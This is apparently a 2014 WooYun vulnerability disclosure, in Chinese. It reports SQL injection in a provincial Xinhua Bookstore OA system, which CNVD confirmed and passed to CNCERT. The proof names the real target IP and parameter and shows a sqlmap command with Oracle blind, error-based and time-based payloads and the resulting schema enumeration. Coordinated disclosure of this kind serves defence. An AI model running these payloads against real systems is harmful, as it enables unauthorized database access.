当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069632

漏洞标题:某省全新华书店oa系统sql注入(Oracle库)

相关厂商:新华书店

漏洞作者: scanf

提交时间:2014-07-25 11:51

修复时间:2014-09-08 11:52

公开时间:2014-09-08 11:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-25: 细节已通知厂商并且等待厂商处理中
2014-07-30: 厂商已经确认,细节仅向厂商公开
2014-08-09: 细节向核心白帽子及相关领域专家公开
2014-08-19: 细节向普通白帽子公开
2014-08-29: 细节向实习白帽子公开
2014-09-08: 细节向公众公开

简要描述:

新华书店啊!好多地方啊,全省啊!好屌的感觉啊,会不会上首页啊!

详细说明:

QQ截图20140725072534.png


站 点 
                    
                    <option value = "anji">安吉县店</option>
                    
                    <option value = "b2b">博库批发</option>
                    
                    <option value = "b2g">博库大客户</option>
                    
                    <option value = "beilun">北仑区书店</option>
                    
                    <option value = "bkgc">博库馆藏</option>
                    
                    <option value = "bookuu">集团公司频道</option>
                    
                    <option value = "cangnan">苍南县店</option>
                    
                    <option value = "changshan">常山县店</option>
                    
                    <option value = "changxing">长兴县店</option>
                    
                    <option value = "chunan">淳安县店</option>
                    
                    <option value = "cixi">慈溪市店</option>
                    
                    <option value = "daishan">岱山县店</option>
                    
                    <option value = "deqing">德清县店</option>
                    
                    <option value = "dongyang">东阳市店</option>
                    
                    <option value = "fenghua">奉化市店</option>
                    
                    <option value = "fttest">繁体网站测试</option>
                    
                    <option value = "fuyang">富阳市店</option>
                    
                    <option value = "ghs">供货商</option>
                    
                    <option value = "group">集团门户</option>
                    
                    <option value = "haining">海宁市店</option>
                    
                    <option value = "haiyan">海盐县店</option>
                    
                    <option value = "hangzhou">杭州市店</option>
                    
                    <option value = "huzhou">湖州市店</option>
                    
                    <option value = "jiande">建德市店</option>
                    
                    <option value = "jiangshan">江山市店</option>
                    
                    <option value = "jiashan">嘉善县店</option>
                    
                    <option value = "jiaxing">嘉兴市店</option>
                    
                    <option value = "jingning">景宁县店</option>
                    
                    <option value = "jinhua">金华市店</option>
                    
                    <option value = "jinyun">缙云县店</option>
                    
                    <option value = "kaihua">开化县店</option>
                    
                    <option value = "kfbook">三毛书城</option>
                    
                    <option value = "lanxi">兰溪市店</option>
                    
                    <option value = "linan">临安市店</option>
                    
                    <option value = "linhai">临海市店</option>
                    
                    <option value = "lishui">丽水市店</option>
                    
                    <option value = "longgang">深圳龙岗书城</option>
                    
                    <option value = "longquan">龙泉县店</option>
                    
                    <option value = "longyou">龙游县店</option>
                    
                    <option value = "meiguo">美国</option>
                    
                    <option value = "meiguokgsm">美国可供书目</option>
                    
                    <option value = "ningbo">宁波市店</option>
                    
                    <option value = "ninghai">宁海县店</option>
                    
                    <option value = "panan">磐安县店</option>
                    
                    <option value = "peixun">演示网站</option>
                    
                    <option value = "pinghu">平湖市店</option>
                    
                    <option value = "pingyang">平阳县店</option>
                    
                    <option value = "pujiang">浦江县店</option>
                    
                    <option value = "putuo">普陀新华书店</option>
                    
                    <option value = "qingtian">青田县店</option>
                    
                    <option value = "qingyuan">庆元县店</option>
                    
                    <option value = "quzhou">衢州市店</option>
                    
                    <option value = "qz">泉州书城</option>
                    
                    <option value = "ruian">瑞安市店</option>
                    
                    <option value = "sanmen">三门县店</option>
                    
                    <option value = "shanghainew">上海博库新站</option>
                    
                    <option value = "shangyu">上虞市店</option>
                    
                    <option value = "shaoxing">绍兴市店</option>
                    
                    <option value = "shaoxingxian">绍兴县店</option>
                    
                    <option value = "shengzhou">嵊州市新华书店</option>
                    
                    <option value = "songyang">松阳县店</option>
                    
                    <option value = "suichang">遂昌县店</option>
                    
                    <option value = "taishun">泰顺县店</option>
                    
                    <option value = "taiwan">台湾天龙</option>
                    
                    <option value = "taiyuan">太原市店</option>
                    
                    <option value = "taizhou">台州市店</option>
                    
                    <option value = "tiantai">天台县店</option>
                    
                    <option value = "tonglu">桐庐县店</option>
                    
                    <option value = "tongxiang">桐乡市店</option>
                    
                    <option value = "tzsc">台州书城</option>
                    
                    <option value = "wencheng">文成县店</option>
                    
                    <option value = "wenling">温岭市店</option>
                    
                    <option value = "wenzhou">温州市店</option>
                    
                    <option value = "wqnew">网群新站点</option>
                    
                    <option value = "wuyi">武义县店</option>
                    
                    <option value = "xiangshan">象山县店</option>
                    
                    <option value = "xianju">仙居县店</option>
                    
                    <option value = "xiaoshan">萧山市店</option>
                    
                    <option value = "xinchang">新昌县店</option>
                    
                    <option value = "xuzhou">徐州博库</option>
                    
                    <option value = "yinzhou">鄞州区店</option>
                    
                    <option value = "yiwu">浙义乌市店</option>
                    
                    <option value = "yongjia">永嘉县店</option>
                    
                    <option value = "yongkang">永康市店</option>
                    
                    <option value = "yueqing">乐清市店</option>
                    
                    <option value = "yuhang">余杭新华书店</option>
                    
                    <option value = "yuhuan">玉环县店</option>
                    
                    <option value = "yunhe">云和县店</option>
                    
                    <option value = "yuyao">余姚市店</option>
                    
                    <option value = "zhenhai">镇海区书店</option>
                    
                    <option value = "zhoushan">舟山市店</option>
                    
                    <option value = "zhuji">诸暨书城</option>


这些地方的
还包括

QQ截图20140725072609.png


QQ截图20140725072635.png


这些的数据都在一个库

漏洞证明:

注入点:http://60.191.110.113/debug/detail.jspdetailid=200504201215498043487091470000000010

[wooyun@scanf~]# Sqlmap -u "http://60.191.110.113/debug/detail.jsp?detailid=2005
04201215498043487091470000000010" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:27:39
[07:27:39] [INFO] resuming back-end DBMS 'oracle'
[07:27:39] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: detailid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: detailid=200504201215498043487091470000000010 AND 4338=4338
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: detailid=200504201215498043487091470000000010 AND 1064=(SELECT UPPE
R(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(108)||CHR(108)||CHR(113)||(SE
LECT (CASE WHEN (1064=1064) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(104)||C
HR(121)||CHR(115)||CHR(113)||CHR(62))) FROM DUAL)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: detailid=200504201215498043487091470000000010 AND 2045=(SELECT COUN
T(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
---
[07:27:40] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[07:27:40] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[07:27:40] [INFO] fetching database (schema) names
[07:27:40] [INFO] the SQL query used returns 10 entries
[07:27:40] [INFO] resumed: CTXSYS
[07:27:40] [INFO] resumed: EXFSYS
[07:27:40] [INFO] resumed: MDSYS
[07:27:40] [INFO] resumed: OA
[07:27:40] [INFO] resumed: OLAPSYS
[07:27:40] [INFO] resumed: PUBLISH
[07:27:40] [INFO] resumed: SYS
[07:27:40] [INFO] resumed: SYSTEM
[07:27:40] [INFO] resumed: WORKFLOWENGINE
[07:27:40] [INFO] resumed: XINHUA
available databases [10]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OA
[*] OLAPSYS
[*] PUBLISH
[*] SYS
[*] SYSTEM
[*] WORKFLOWENGINE
[*] XINHUA
[07:27:40] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\60.191.110.113'
[*] shutting down at 07:27:40


QQ截图20140725075330.png


太多了,就不浪费时间了.

修复方案:

没有深入,不过老的oa系统什么的该升级了.
如果还用这套系统,就各种补吧,还是换换吧.

版权声明:转载请注明来源 scanf@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-07-30 09:02

厂商回复:

CNVD确认并复现所述情况,转由CNCERT下发给浙江分中心,由其后续联系网站管理单位处置。

最新状态:

暂无